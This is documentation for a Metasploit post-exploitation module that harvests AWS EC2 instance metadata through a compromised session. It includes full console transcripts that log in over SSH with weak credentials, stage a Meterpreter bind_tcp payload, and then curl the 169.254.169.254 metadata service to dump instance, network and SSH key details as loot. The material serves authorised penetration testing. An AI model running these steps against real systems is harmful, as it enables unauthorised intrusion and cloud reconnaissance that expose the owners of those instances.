Vulnerable Application

This module uses an existing session on an AWS EC2 instance to gather metadata about that instance from the EC2 instance metadata service (http://169.254.169.254/latest/meta-data/). It does so by invoking curl on the target, so any EC2 instance with curl available is an applicable target.

Verification Steps

  1. Obtain a session on the target EC2 instance
  2. Do use post/multi/gather/aws_ec2_instance_metadata
  3. Do set SESSION <session id>
  4. Do run
  5. See loot.

Options

Set VERBOSE to true if you would like the AWS EC2 instance metadata (and the metadata URLs fetched) to be printed to the console in addition to being stored as loot.

Scenarios

Default, non-verbose mode:

resource (msf.rc)> use exploit/multi/ssh/sshexec
resource (msf.rc)> set PASSWORD test
PASSWORD => test
resource (msf.rc)> set USERNAME test
USERNAME => test
resource (msf.rc)> set PAYLOAD linux/x86/meterpreter/bind_tcp
PAYLOAD => linux/x86/meterpreter/bind_tcp
resource (msf.rc)> set RHOST 192.168.2.2
RHOST => 192.168.2.2
resource (msf.rc)> run -j
[*] Exploit running as background job.
resource (msf.rc)> sleep 10
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] 192.168.2.2:22 - Sending stager...
[*] Command Stager progress -  42.09% done (306/727 bytes)
[*] Sending stage (1495599 bytes) to 192.168.2.2
[*] Command Stager progress - 100.00% done (727/727 bytes)
[*] Meterpreter session 1 opened (192.168.1.149:52075 -> 192.168.2.2:4444) at 2016-09-30 06:40:44 -0700

resource (msf.rc)> use post/multi/gather/aws_ec2_instance_metadata
resource (msf.rc)> set SESSION 1
SESSION => 1
resource (msf.rc)> run
[*] Gathering AWS EC2 instance metadata
[+] Saved AWS EC2 instance metadata to to /Users/jhart/.msf4/loot/20160930064126_default_192.168.2.2_aws.ec2.instance_509214.txt
[*] Post module execution completed

Non-default, verbose mode:

resource (msf.rc)> use exploit/multi/ssh/sshexec
resource (msf.rc)> set PASSWORD test
PASSWORD => test
resource (msf.rc)> set USERNAME test
USERNAME => test
resource (msf.rc)> set PAYLOAD linux/x86/meterpreter/bind_tcp
PAYLOAD => linux/x86/meterpreter/bind_tcp
resource (msf.rc)> set RHOST 192.168.2.2
RHOST => 192.168.2.2
resource (msf.rc)> run -j
[*] Exploit running as background job.
resource (msf.rc)> sleep 10
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] 192.168.2.2:22 - Sending stager...
[*] Command Stager progress -  42.09% done (306/727 bytes)
[*] Sending stage (1495599 bytes) to 192.168.2.2
[*] Command Stager progress - 100.00% done (727/727 bytes)
[*] Meterpreter session 1 opened (192.168.1.149:52775 -> 192.168.2.2:4444) at 2016-09-30 06:55:54 -0700
resource (msf.rc)> use post/multi/gather/aws_ec2_instance_metadata
resource (msf.rc)> set SESSION 1
SESSION => 1
resource (msf.rc)> set VERBOSE true
VERBOSE => true
resource (msf.rc)> run
[*] Fetching http://169.254.169.254/latest/meta-data/
[*] Gathering AWS EC2 instance metadata
[*] Fetching http://169.254.169.254/latest/meta-data/ami-id
[*] Fetching http://169.254.169.254/latest/meta-data/ami-launch-index
[*] Fetching http://169.254.169.254/latest/meta-data/ami-manifest-path
[*] Fetching http://169.254.169.254/latest/meta-data/block-device-mapping/
[*] Fetching http://169.254.169.254/latest/meta-data/block-device-mapping/ami
[*] Fetching http://169.254.169.254/latest/meta-data/block-device-mapping/root
[*] Fetching http://169.254.169.254/latest/meta-data/hostname
[*] Fetching http://169.254.169.254/latest/meta-data/instance-action
[*] Fetching http://169.254.169.254/latest/meta-data/instance-id
[*] Fetching http://169.254.169.254/latest/meta-data/instance-type
[*] Fetching http://169.254.169.254/latest/meta-data/local-hostname
[*] Fetching http://169.254.169.254/latest/meta-data/local-ipv4
[*] Fetching http://169.254.169.254/latest/meta-data/mac
[*] Fetching http://169.254.169.254/latest/meta-data/metrics/
[*] Fetching http://169.254.169.254/latest/meta-data/metrics/vhostmd
[*] Fetching http://169.254.169.254/latest/meta-data/network/
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/device-number
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/interface-id
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/ipv4-associations/
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/ipv4-associations/192.168.2.2
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/local-hostname
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/local-ipv4s
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/mac
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/owner-id
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/public-hostname
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/public-ipv4s
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/security-group-ids
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/security-groups
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/subnet-id
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/subnet-ipv4-cidr-block
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/vpc-id
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/vpc-ipv4-cidr-block
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/vpc-ipv4-cidr-blocks
[*] Fetching http://169.254.169.254/latest/meta-data/placement/
[*] Fetching http://169.254.169.254/latest/meta-data/placement/availability-zone
[*] Fetching http://169.254.169.254/latest/meta-data/profile
[*] Fetching http://169.254.169.254/latest/meta-data/public-hostname
[*] Fetching http://169.254.169.254/latest/meta-data/public-ipv4
[*] Fetching http://169.254.169.254/latest/meta-data/public-keys/
[*] Fetching http://169.254.169.254/latest/meta-data/public-keys/0/
[*] Fetching http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
[*] Fetching http://169.254.169.254/latest/meta-data/reservation-id
[*] Fetching http://169.254.169.254/latest/meta-data/security-groups
[*] Fetching http://169.254.169.254/latest/meta-data/services/
[*] Fetching http://169.254.169.254/latest/meta-data/services/domain
[*] Fetching http://169.254.169.254/latest/meta-data/services/partition
[+] AWS EC2 instance metadata
{
  "ami-id": "ami-2d39803a",
  "ami-launch-index": "0",
  "ami-manifest-path": "(unknown)",
  "block-device-mapping": {
    "ami": "/dev/sda1",
    "root": "/dev/sda1"
  },
  "hostname": "ip-192.168.2.2.ec2.internal",
  "instance-action": "none",
  "instance-id": "i-16fffae",
  "instance-type": "t2.medium",
  "local-hostname": "ip-192.168.2.2.ec2.internal",
  "local-ipv4": "192.168.2.2",
  "mac": "aa:bb:cc:dd:ee:ff",
  "metrics": {
    "vhostmd": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
  },
  "network": {
    "interfaces": {
      "macs": {
        "aa:bb:cc:dd:ee:ff": {
          "device-number": "0",
          "interface-id": "eni-1234ff",
          "ipv4-associations": {
            "192.168.2.2": "192.168.2.2"
          },
          "local-hostname": "ip-192.168.2.2.ec2.internal",
          "local-ipv4s": "192.168.2.2",
          "mac": "aa:bb:cc:dd:ee:ff",
          "owner-id": "186638383",
          "public-hostname": "ec2-192.168.2.2.compute-1.amazonaws.com",
          "public-ipv4s": "192.168.2.2",
          "security-group-ids": "sg-123a7",
          "security-groups": "launch-wizard-15",
          "subnet-id": "subnet-123453d",
          "subnet-ipv4-cidr-block": "192.0.2.0/24",
          "vpc-id": "vpc-fffffff",
          "vpc-ipv4-cidr-block": "192.0.0.0/16",
          "vpc-ipv4-cidr-blocks": "192.0.0.0/16"
        }
      }
    }
  },
  "placement": {
    "availability-zone": "us-east-1e"
  },
  "profile": "default-hvm",
  "public-hostname": "ec2-192.168.2.2.compute-1.amazonaws.com",
  "public-ipv4": "192.168.2.2",
  "public-keys": {
    "0": {
      "openssh-key": "ssh-rsa <...redacted...> jhart"
    }
  },
  "reservation-id": "r-8675309",
  "security-groups": "launch-wizard-15",
  "services": {
    "domain": "amazonaws.com",
    "partition": "aws"
  }
}
[+] Saved AWS EC2 instance metadata to to /Users/jhart/.msf4/loot/20160930065628_default_192.168.2.2_aws.ec2.instance_622503.txt
[*] Post module execution completed